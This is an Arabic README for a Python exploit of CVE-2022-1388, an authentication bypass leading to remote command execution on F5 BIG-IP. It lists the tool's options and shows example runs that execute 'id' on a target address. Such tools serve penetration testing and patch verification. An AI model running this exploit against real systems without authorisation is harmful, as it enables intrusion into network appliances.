
يتكون هذا المستودع من استغلال python لـ CVE-2022-1388 (تجاوز المصادقة في F5's BIG-IP إلى تنفيذ الأوامر عن بُعد).
يتكون هذا المستودع من كود استغلال Python لثغرة CVE-2022-1388 (RCE في F5 BIG-IP).
الاستخدام: exploit.py [-h] -t TARGET -p PORT -c CMD [--ssl]
الخيارات:
-h, --help اعرض رسالة المساعدة هذه واخرج
-t TARGET, --target TARGET
حدد عنوان IP أو اسم النطاق للخادم المعرّض للثغرة
-p PORT, --port PORT حدد رقم منفذ الخادم المعرّض للثغرة
-c CMD, --cmd CMD حدد الأمر الذي تريد تنفيذه
--ssl حدد هذه الوسيطة الاختيارية إذا كان الخادم يستخدم ssl
مثال -
لخادم ويب يستخدم HTTPS ويعمل على المنفذ 8443 على العنوان 192.168.0.13
./exploit.py -t 192.168.0.13 -p 8443 -c 'id' --ssl
لخادم ويب يستخدم HTTP ويعمل على المنفذ 1346 على العنوان 192.168.0.13
./exploit.py -t 192.168.0.13 -p 1346 -c 'id'